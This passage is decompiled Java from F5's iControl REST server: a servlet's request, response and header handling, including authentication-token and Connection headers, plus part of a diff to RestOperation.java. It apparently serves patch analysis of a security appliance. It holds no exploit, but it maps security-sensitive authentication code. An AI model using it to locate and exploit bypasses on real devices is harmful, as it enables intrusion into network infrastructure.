\n public class RestServerServlet\n extends HttpServlet\n {\n private static final long serialVersionUID = -6003011105634738728L;\n private static final int BUFFER_SIZE = (int)ByteUnit.KILOBYTES.toBytes(8L);\n private Logger logger = RestLogger.getLogger(RestServerServlet.class.getName());\n \n \n \n private static void failRequest(AsyncContext context, RestOperation operation, Throwable t, int httpStatusCode) {\n if (operation.generateRestErrorResponse()) {\n operation.setErrorResponseBody(t);\n }\n \n operation.setStatusCode(httpStatusCode);\n sendRestOperation(context, operation);\n }\n \n private static void sendRestOperation(AsyncContext context, RestOperation operation) {\n try {\n writeResponseHeadersFromRestOperation(operation, (HttpServletResponse)context.getResponse());\n context.getResponse().getOutputStream().setWriteListener(new WriteListenerImpl(context, operation));\n } catch (IOException e) {\n context.complete();\n }\n }\n \n \n private class ReadListenerImpl\n implements ReadListener\n {\n private AsyncContext context;\n \n private ServletInputStream inputStream;\n private RestOperation operation;\n private byte[] buffer;\n private ByteArrayOutputStream outputStream;\n \n ReadListenerImpl(AsyncContext context, ServletInputStream inputStream, RestOperation operation) {\n this.context = context;\n this.inputStream = inputStream;\n this.operation = operation;\n this.buffer = null;\n this.outputStream = null;\n }\n \n \n public void onDataAvailable() throws IOException {\n if (this.operation == null) {\n throw new IOException(\"Missing operation\");\n }\n \n if (this.outputStream == null) {\n int contentLength = (int)this.operation.getContentLength();\n if (contentLength == -1) {\n this.outputStream = new ByteArrayOutputStream();\n } else {\n this.outputStream = new ByteArrayOutputStream(contentLength);\n }\n }\n \n \n \n \n \n if (this.buffer == null)\n this.buffer = new byte[RestServerServlet.BUFFER_SIZE];\n int len;\n while (this.inputStream.isReady() && (len = this.inputStream.read(this.buffer)) != -1) {\n this.outputStream.write(this.buffer, 0, len);\n }\n }\n \n \n public void onAllDataRead() throws IOException {\n if (this.outputStream != null) {\n \n if (this.operation.getContentType() == null) {\n this.operation.setIncomingContentType(\"application/json\");\n }\n \n if (RestHelper.contentTypeUsesBinaryBody(this.operation.getContentType())) {\n byte[] binaryBody = this.outputStream.toByteArray();\n this.operation.setBinaryBody(binaryBody, this.operation.getContentType());\n } else {\n String body = this.outputStream.toString(StandardCharsets.UTF_8.name());\n this.operation.setBody(body, this.operation.getContentType());\n }\n }\n \n RestOperationIdentifier.setIdentityFromAuthenticationData(this.operation, new Runnable()\n {\n public void run()\n {\n if (!RestServer.trySendInProcess(RestServerServlet.ReadListenerImpl.this.operation)) {\n RestServerServlet.failRequest(RestServerServlet.ReadListenerImpl.this.context, RestServerServlet.ReadListenerImpl.this.operation, (Throwable)new RestWorkerUriNotFoundException(RestServerServlet.ReadListenerImpl.this.operation.getUri().toString()), 404);\n }\n }\n });\n \n \n \n RestServer.trace(this.operation);\n }\n \n \n public void onError(Throwable throwable) {\n if (this.operation != null)\n this.operation.fail(throwable);\n }\n }\n \n private static class WriteListenerImpl\n implements WriteListener\n {\n AsyncContext context;\n RestOperation operation;\n byte[] responseBody;\n ServletOutputStream outputStream;\n \n public WriteListenerImpl(AsyncContext context, RestOperation operation) {\n this.context = context;\n this.responseBody = HttpParserHelper.encodeBody(operation);\n if (this.responseBody != null) {\n context.getResponse().setContentLength(this.responseBody.length);\n }\n \n try {\n this.outputStream = context.getResponse().getOutputStream();\n } catch (IOException e) {\n onError(e);\n }\n }\n \n \n \n public void onWritePossible() throws IOException {\n while (this.outputStream.isReady()) {\n if (this.responseBody != null) {\n this.outputStream.write(this.responseBody);\n this.responseBody = null; continue;\n }\n this.context.complete();\n return;\n }\n }\n \n \n \n public void onError(Throwable throwable) {\n this.operation.fail(throwable);\n }\n }\n \n \n \n \n protected void service(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n final AsyncContext context = req.startAsync();\n \n context.start(new Runnable()\n {\n public void run() {\n RestOperation op = null;\n try {\n op = RestServerServlet.this.createRestOperationFromServletRequest((HttpServletRequest)context.getRequest());\n if (op == null) {\n HttpServletResponse errResp = (HttpServletResponse)context.getResponse();\n \n errResp.sendError(400, \"Error processing request\");\n \n context.complete();\n return;\n }\n } catch (Exception e) {\n RestServerServlet.this.logger.warning(\"cannot create RestOperation \" + e.getMessage());\n context.complete();\n \n return;\n }\n op.setCompletion(new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n RestServerServlet.sendRestOperation(context, operation);\n }\n \n \n public void failed(Exception ex, RestOperation operation) {\n RestServerServlet.failRequest(context, operation, ex, operation.getStatusCode());\n }\n });\n \n try {\n ServletInputStream inputStream = context.getRequest().getInputStream();\n inputStream.setReadListener(new RestServerServlet.ReadListenerImpl(context, inputStream, op));\n } catch (IOException e) {\n RestServerServlet.failRequest(context, op, e, 500);\n }\n }\n });\n }\n \n \n \n public static String getFullURL(HttpServletRequest request) {\n StringBuilder requestURL = new StringBuilder(request.getRequestURI());\n String queryString = request.getQueryString();\n \n if (queryString == null) {\n return requestURL.toString();\n }\n return requestURL.append('?').append(queryString).toString();\n }\n \n \n private static void writeResponseHeadersFromRestOperation(RestOperation operation, HttpServletResponse response) {\n boolean traceHeaders = (RestHelper.getOperationTracingLevel().intValue() <= Level.FINER.intValue());\n \n - if (operation.getOutgoingContentType() == null) {\n + if (operation.getOutgoingContentType() == null || operation.getStatusCode() >= 400)\n + {\n operation.defaultToContentTypeJson();\n }\n \n response.setContentType(operation.getOutgoingContentType());\n \n if (operation.getOutgoingContentEncoding() != null) {\n response.setCharacterEncoding(operation.getOutgoingContentEncoding());\n }\n \n if (operation.getAllow() != null) {\n AddResponseHeader(operation, response, \"Allow\", operation.getAllow(), traceHeaders);\n }\n if (operation.getContentRange() != null) {\n AddResponseHeader(operation, response, \"Content-Range\", operation.getContentRange(), traceHeaders);\n }\n \n if (operation.getContentDisposition() != null) {\n AddResponseHeader(operation, response, \"Content-Disposition\", operation.getContentDisposition(), traceHeaders);\n }\n \n if (operation.getWwwAuthenticate() != null) {\n AddResponseHeader(operation, response, \"WWW-Authenticate\", operation.getWwwAuthenticate(), traceHeaders);\n }\n \n if (operation.containsApiStatusInformation()) {\n AddResponseHeader(operation, response, \"X-F5-Api-Status\", HttpParserHelper.formatApiStatusHeader(operation), traceHeaders);\n }\n \n if (operation.getAdditionalHeaders(RestOperation.Direction.RESPONSE) != null) {\n Map<String, String> headers = operation.getAdditionalHeaders(RestOperation.Direction.RESPONSE).getHeaderMap();\n \n for (Map.Entry<String, String> header : headers.entrySet()) {\n AddResponseHeader(operation, response, header.getKey(), header.getValue(), traceHeaders);\n }\n }\n \n response.setStatus(operation.getStatusCode());\n AddResponseHeader(operation, response, \"Pragma\", \"no-cache\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"no-store\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"no-cache\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"must-revalidate\", traceHeaders);\n AddResponseHeader(operation, response, \"Expires\", \"-1\", traceHeaders);\n }\n \n \n private static void AddResponseHeader(RestOperation operation, HttpServletResponse response, String headerName, String headerValue, boolean traceHeaders) {\n response.addHeader(headerName, headerValue);\n }\n \n \n \n \n \n \n \n private static Map<String, HeaderHandler> HEADER_HANDLERS = new HashMap<>();\n static {\n HEADER_HANDLERS.put(\"Accept\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setAccept(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Authorization\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op)\n {\n String[] authHeader = headerValue.split(\" \");\n if (authHeader[0].equalsIgnoreCase(\"BASIC\")) {\n op.setBasicAuthorizationHeader(authHeader[1]);\n }\n }\n });\n HEADER_HANDLERS.put(\"Allow\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setAllow(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Transfer-Encoding\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setTransferEncoding(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Referer\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setReferer(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-REST-Coordination-Id\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setCoordinationId(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-Forwarded-For\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXForwardedFor(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-Auth-Token\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXAuthToken(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Auth-Token\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXF5AuthToken(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Connection\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n if (headerValue.equalsIgnoreCase(\"Keep-Alive\")) {\n op.setConnectionKeepAlive(true);\n op.setConnectionClose(false);\n } else if (headerValue.equalsIgnoreCase(\"Close\")) {\n op.setConnectionKeepAlive(false);\n op.setConnectionClose(true);\n } else {\n op.setConnectionKeepAlive(false);\n op.setConnectionClose(false);\n }\n }\n });\n HEADER_HANDLERS.put(\"Content-Length\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentLength(Integer.parseInt(headerValue));\n }\n });\n HEADER_HANDLERS.put(\"Content-Type\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setIncomingContentType(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Content-Range\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentRange(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Content-Disposition\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentDisposition(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Gossip\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setGossipHeader(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Api-Status\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n HttpParserHelper.formatFromApiStatusHeader(op, headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Config-Api-Status\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String bitMaskStr, RestOperation op) {\n try {\n long bitMask = Long.parseLong(bitMaskStr);\n op.setXF5ConfigApiStatus(bitMask);\n }\n catch (NumberFormatException ignored) {}\n }\n });\n HEADER_HANDLERS.put(\"Cookie\".toUpperCase(), new HeaderHandler()\n {\n \n \n public void processHeaderValue(String headerValue, RestOperation op)\n {\n if (headerValue.endsWith(\";\")) {\n headerValue = headerValue + \" \";\n }\n if (!headerValue.endsWith(\"; \")) {\n headerValue = headerValue + \"; \";\n }\n HttpParserHelper.parseCookieJarElements(op, headerValue);\n }\n });\n HEADER_HANDLERS.put(\"WWW-Authenticate\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setWwwAuthenticate(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-REST-Coordination-Id\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setCoordinationId(headerValue);\n }\n });\n }\n \n \n public static void setHostIpAddress(HttpServletRequest request, RestOperation operation) {\n if (request == null || operation == null) {\n return;\n }\n \n if (operation.getAdditionalHeader(\"X-Forwarded-Host\") == null || operation.getAdditionalHeader(\"X-Forwarded-Host\").isEmpty()) {\n \n \n String requestUrl = request.getRequestURL().toString();\n String hostIpAddress = \"localhost\";\n if (requestUrl != null && requestUrl.contains(\"://\")) {\n \n \n requestUrl = requestUrl.split(\"://\")[1];\n hostIpAddress = requestUrl.split(\"/\")[0];\n }\n operation.addAdditionalHeader(\"X-Forwarded-Host\", hostIpAddress);\n }\n }\n \n private RestOperation createRestOperationFromServletRequest(HttpServletRequest request) throws URISyntaxException {\n String port = getInitParameter(\"port\");\n String fullUrl = getFullURL(request);\n \n URI targetUri = new URI(String.format(\"%s%s:%s%s\", new Object[] { \"http://\", \"localhost\", port, fullUrl }));\n \n \n \n \n \n RestOperation op = RestOperation.create().setMethod(RestOperation.RestMethod.valueOf(request.getMethod().toUpperCase())).setUri(targetUri);\n \n \n \n Enumeration<String> headerNames = request.getHeaderNames();\n while (headerNames.hasMoreElements()) {\n String headerName = headerNames.nextElement();\n String headerValue = request.getHeader(headerName);\n if (RestOperation.isStandardHeader(headerName)) {\n if (headerValue == null) {\n this.logger.warning(headerName + \" doesn't have value, so skipping\");\n continue;\n }\n HeaderHandler headerHandler = HEADER_HANDLERS.get(headerName.toUpperCase());\n if (headerHandler != null) {\n headerHandler.processHeaderValue(headerValue, op);\n }\n continue;\n }\n op.addAdditionalHeader(headerName, headerValue);\n }\n \n \n \n \n \n \n if (fullUrl.substring(1).startsWith(\"mgmt\")) {\n setHostIpAddress(request, op);\n }\n \n return op;\n }\n \n private static interface HeaderHandler {\n void processHeaderValue(String param1String, RestOperation param1RestOperation);\n }\n }\n diff --git a/com/f5/rest/common/RestOperation.java b/com/f5/rest/common/RestOperation.java\n index ee882d4..fc91fdd 100644\n --- a/com/f5/rest/common/RestOperation.java\n +++ b/com/f5/rest/common/RestOperation.java\n @@ -1,2875 +1,2876 @@\n package com.f5.rest.common;\n \n import com.f5.rest.workers.AuthTokenItemState;\n import com.f5.rest.workers.authz.AuthzHelper;\n import com.google.gson.Gson;\n import com.google.gson.GsonBuilder;\n import com.google.gson.JsonElement;\n import com.google.gson.JsonObject;\n import com.google.gson.JsonParser;\n import com.google.gson.JsonSyntaxException;\n import java.io.Reader;\n import java.lang.reflect.Type;\n import java.net.SocketAddress;\n import java.net.URI;\n import java.nio.charset.StandardCharsets;\n import java.security.cert.Certificate;\n import java.util.ArrayList;\n import java.util.Date;\n import java.util.EnumSet;\n import java.util.HashMap;\n import java.util.HashSet;\n +import java.util.Iterator;\n import java.util.List;\n import java.util.Map;\n import java.util.Set;\n import java.util.concurrent.atomic.AtomicInteger;\n import java.util.concurrent.atomic.AtomicLong;\n import java.util.logging.Level;\n import javax.xml.bind.DatatypeConverter;\n import org.joda.time.DateTime;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public class RestOperation\n implements Cloneable\n {\n public static class HttpException\n extends Exception\n {\n private static final long serialVersionUID = 1L;\n \n public HttpException(String message) {\n super(message);\n }\n }\n \n private static final RestLogger LOGGER = new RestLogger(RestOperation.class, \"\");\n \n public static final int STATUS_OK = 200;\n \n public static final int STATUS_CREATED = 201;\n \n public static final int STATUS_ACCEPTED = 202;\n \n public static final int STATUS_NO_CONTENT = 204;\n \n public static final int STATUS_PARTIAL_CONTENT = 206;\n \n public static final int STATUS_FOUND = 302;\n \n public static final int STATUS_BAD_REQUEST = 400;\n public static final int STATUS_FAILURE_THRESHOLD = 400;\n public static final int STATUS_UNAUTHORIZED = 401;\n public static final int STATUS_FORBIDDEN = 403;\n public static final int STATUS_NOT_FOUND = 404;\n public static final int STATUS_METHOD_NOT_ALLOWED = 405;\n public static final int STATUS_NOT_ACCEPTABLE = 406;\n public static final int STATUS_CONFLICT = 409;\n public static final int STATUS_INTERNAL_SERVER_ERROR = 500;\n public static final int STATUS_NOT_IMPLEMENTED = 501;\n public static final int STATUS_BAD_GATEWAY = 502;\n public static final int STATUS_SERVICE_UNAVAILABLE = 503;\n public static final int STATUS_INSUFFICIENT_STORAGE = 507;\n public static final String REMOTE_SENDER_IN_PROCESS = \"InProcess\";\n public static final String REMOTE_SENDER_UNKNOWN = \"Unknown\";\n public static final String EMPTY_JSON_BODY = \"{}\";\n public static final long UNKNOWN_CONTENT_LENGTH = -1L;\n public static String WILDCARD = \"*\";\n public static String WILDCARD_PATH = \"/\" + WILDCARD;\n \n \n \n private Certificate[] serverCertificateChain;\n \n \n \n \n public static class ParsedCollectionEntry\n {\n public String collectionName;\n \n \n \n public String entryKey;\n }\n \n \n \n \n public enum RestMethod\n {\n GET, POST, PUT, DELETE, PATCH, OPTIONS;\n \n private static final String[] methodHandlerNames = new String[] { \"onGet\", \"onPost\", \"onPut\", \"onDelete\", \"onPatch\", \"onOptions\" };\n static {\n \n }\n \n public String getMethodHandlerName() {\n return methodHandlerNames[ordinal()];\n }\n }\n \n \n \n \n public enum RestOperationFlags\n {\n IDENTIFIED,\n \n VERIFIED;\n }\n \n public static boolean contentTypeEquals(String mediaTypeA, String mediaTypeB) {\n return (mediaTypeA.hashCode() == mediaTypeB.hashCode());\n }\n \n \n \n \n \n public Certificate[] getServerCertificateChain() {\n return this.serverCertificateChain;\n }\n \n RestOperation setServerCertificateChain(Certificate[] certificates) {\n this.serverCertificateChain = certificates;\n return this;\n }\n \n \n protected static final AtomicInteger maxMessageBodySize = new AtomicInteger(33554432);\n \n \n \n protected static final AtomicInteger defaultMessageBodySize = new AtomicInteger(16384);\n \n \n private static Gson gson = allocateGson(false);\n private static Gson extendedGson = allocateGson(true); public static final String HTTP_HEADER_FIELD_VALUE_SEPARATOR = \":\"; public static final String X_F5_REST_COORDINATION_ID_HEADER = \"X-F5-REST-Coordination-Id\"; public static final String X_F5_REST_COORDINATION_ID_HEADER_WITH_COLON = \"X-F5-REST-Coordination-Id:\"; public static final String X_FORWARDED_FOR_HEADER = \"X-Forwarded-For\"; public static final String X_FORWARDED_FOR_HEADER_WITH_COLON = \"X-Forwarded-For:\"; public static final String X_F5_AUTH_TOKEN_HEADER = \"X-F5-Auth-Token\"; public static final String X_F5_AUTH_TOKEN_HEADER_WITH_COLON = \"X-F5-Auth-Token:\"; public static final String X_AUTH_TOKEN_HEADER = \"X-Auth-Token\"; public static final String X_AUTH_TOKEN_HEADER_WITH_COLON = \"X-Auth-Token:\"; public static final String X_F5_GOSSIP_HEADER = \"X-F5-Gossip\"; public static final String X_F5_GOSSIP_HEADER_WITH_COLON = \"X-F5-Gossip:\"; public static final String BASIC_REALM_REST_API = \"Basic realm='REST API'\"; public static final String WWW_AUTHENTICATE_HEADER = \"WWW-Authenticate\"; public static final String WWW_AUTHENTICATE_HEADER_WITH_COLON = \"WWW-Authenticate:\";\n \n static Gson getGson() {\n return gson;\n }\n public static final String HOST_HEADER = \"Host\"; public static final String CONNECTION_HEADER = \"Connection\"; public static final String CONTENT_TYPE_HEADER = \"Content-Type\"; public static final String CONTENT_DISPOSITION_HEADER = \"Content-Disposition\"; public static final String CONTENT_LENGTH_HEADER = \"Content-Length\"; public static final String CONTENT_RANGE_HEADER = \"Content-Range\"; public static final String USER_AGENT_HEADER = \"User-Agent\"; public static final String SET_COOKIE_HEADER = \"Set-Cookie\"; public static final String DATE_HEADER = \"Date\"; public static final String SERVER_HEADER = \"Server\"; public static final String CACHE_CONTROL_HEADER = \"Cache-Control\"; public static final String PRAGMA_HEADER = \"Pragma\"; public static final String EXPIRES_HEADER = \"Expires\"; public static final String ACCEPT_HEADER = \"Accept\";\n static Gson getExtendedGson() {\n return extendedGson;\n }\n \n \n \n \n \n \n \n \n private static Gson allocate